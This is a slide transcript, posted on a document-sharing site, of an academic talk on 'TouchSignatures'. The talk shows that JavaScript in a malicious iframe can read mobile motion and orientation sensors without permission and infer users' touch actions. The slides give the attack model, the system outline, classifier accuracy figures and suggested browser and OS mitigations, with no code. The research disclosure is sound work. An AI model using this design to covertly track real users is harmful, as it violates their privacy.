+ All Categories
Home > Documents > TOUCHSIGNATURES Maryam Mehrnezhad, Ehsan Toreini, Siamak F. Shahandashti, Feng Hao Newcastle...

TOUCHSIGNATURES Maryam Mehrnezhad, Ehsan Toreini, Siamak F. Shahandashti, Feng Hao Newcastle...

Date post: 02-Jan-2016
Category:
Upload: edward-blankenship
View: 214 times
Download: 0 times
Share this document with a friend
Popular Tags:
27
TOUCHSIGNATURES Maryam Mehrnezhad, Ehsan Toreini, Siamak F. Shahandashti, Feng Hao Newcastle University CryptoForma meeting, Belfast 4 May 2015
Transcript

TOUCHSIGNATURESMaryam Mehrnezhad, Ehsan Toreini, Siamak F. Shahandashti, Feng Hao

Newcastle University

CryptoForma meeting, Belfast

4 May 2015

The Attack • Identification of User Touch Actions Based on Mobile

Sensor Data via JavaScript• Accepted in ASIACCS’15

Touch Action Description

Click Touching an item momentarily with one finger

Scroll (Up, Down, Right, Left) Touching continuously and simultaneously sliding in the corresponding direction

Zoom (In, Out) Placing 2 fingers on the screen and sliding them apart or toward each other, respectively

Hold Touching continuously for a while with one finger

HTML 5

• HTML5 is moving toward handling system functionalities:• Ideas such as

B2G(boot2gecko) by Mozilla

• Having that in mind, it is not surprising that HTML5 can get mobile sensor related data

HTML 5• Currently, mobile web applications have access to the

following sensors:• Geolocation• Multimedia (video, camera, microphone, webcams)• Ambient light• motion and orientation

HTML 5• According to W3C specifications, modern web browsers

allow JavaScript code to access motion and orientation sensor data.

Core IDEA• This project targets this question:

• What are the possible privacy leakages?• Is it possible to recognize user actions using the sensor data

acquired by JavaScript?• Neither iOS nor Android ask permission to access these sensors via

browsers

• Accessing sensor data within mobile apps has already been studied

• Different security or privacy attacks in the literature

Some Challenges• The mobile in-browser sensor data access is only

restricted to two streams: • Orientation: supplies the physical orientation of the device• Device motion: acceleration of the device

• In-browser access is limited in contrast to raw sensor data access in normal applications:• processed data• Low rate streams with frequencies around 5 to 10 times slower

than in-app data

Privacy Breaches• Unlike other sensor accesses, no authorization from the

user to access orientation and acceleration data.• This could possibly leak information such as:

• User Physical Movements (walking, running, sitting)• Some User Interactions with the device that has specific patterns

(such as answering calls, Taking Photos) • User Touch Actions

Touch Actions• Identification of touch actions may reveal a range of

activities about the user’s interaction with other webpages.• E.g. users tend to mostly scroll on a news website while trying

mostly to type when using an email client.

TouchSignature• Our system is able to distinguish user touch actions given

access to the device motion and orientation sensor data• Attack Model: a malicious web content spying on a user

via JavaScript. • The content is loaded via an iframe embedded in the webpage.• Browser is actively, or passively in the background• User has access to the Internet

Some Technical Details• According to W3C, HTML5 and JavaScript provide access

to the following sensor data:• Device Orientation: Three rotations, alpha, beta and gamma• Device Acceleration: Cartesian coordinates: x,y and z• Device Acceleration including Gravity• Device Rotation Rate: three rotations alpha, beta and gamma• Interval: rate of sensor reading in milliseconds

• We have developed Touchsignatures:• server side as Node.js and mongodB.• Client Side JavaScript library called socket.io to send live sensor

data streams• Use of supervised Machine Learning techniques to analyse data

Experiments

Touch Action Description

Click Touching an item momentarily with one finger

Scroll (Up, Down, Right, Left) Touching continuously and simultaneously sliding in the corresponding direction

Zoom (In, Out) Placing 2 fingers on the screen and sliding them apart or toward each other, respectively

Hold Touching continuously for a while with one finger

Experiments• We collected data from 11 volunteers • We presented each user a brief introduction and

instructions to perform 8 touch actions• Experiments were performed on google Chrome in iPhone

5.• We asked each user to perform each action 5 times

• Two types of mobile holding were measured: two handed and one handed

• At the end, we had 10 samples of each touch action for 11 people.

Feature Extraction• Time Domain Features:

• Raw Captured Sequence• First order derivative of each sequence• maximum, minimum and mean of each sequence and its

derivative.• Total Energy or each sequence and its derivative• And some more features, totally 116 features for each touch

• Frequency Domain:• FFT of the sequences• Maximum, Minimum, mean and energy of each sequence.• Totally 48 features

• In General, 164 features for each sequence.

Classification Process

• We implemented different classification algorithms:• Artificial Neural Networks

(ANN)• K-Nearest neighbour (k-

NN)• Decision Tree

• We used 10 fold cross validation approach

• 1-NN showed the best performance

Phase 1 classificationTouch Action Identification

Rate

Click 78.18%

Hold 88.18%

Scroll 95.91%

Zoom In 71.82%

Zoom Out 76.36%

Overall 87.39%

Phase 2 ClassificationTouch Action Identification

Rate

Scroll Down 57.27%

Scroll Up 69.09%

Scroll Right 48.18%

Scroll Left 71.82%

Overall 61.59%

Contribution of Different Sensor Data Streams

• Orientation has got the best impact in the final results.

• The rest of the sensor data combined only effects 3.64%

Browser SupportDevice/mOS/Browser Active Background Locked

Determines the Device/Mobile OS/ Browser Name

Status: When the browser is running actively and interacting with the user

Status: When the browser is not active, but running in background

Status: When browser is not active and the device screen is locked.

Browser SupportDevice/mOS/Browser

Active Background Locked

Same Intra Other Same Other Same Other

When the webpage visited is manipulated

Comparisons of the Popular Browser Sensor Accessibility in Android/iOS

Possible Solutions

Notify users within browser Operating System Settings

Future?• Is it possible to recognize the keys has been pressed by

using this low rate data?• Other privacy breaches?• Open to any other suggestions…

Conclusion• First to perform a practical privacy attack by Sensor data

using JavaScript• User Actions could be recognized by using this sensor

data, even if it is processed and provided in low rates.• This shows a major shortcoming in mobile operating

systems and browser access control policies with respect to user privacy.

• We suggest to apply the same approach as GPS access by providing effective user notification and control mechanism

• THANKS!


Recommended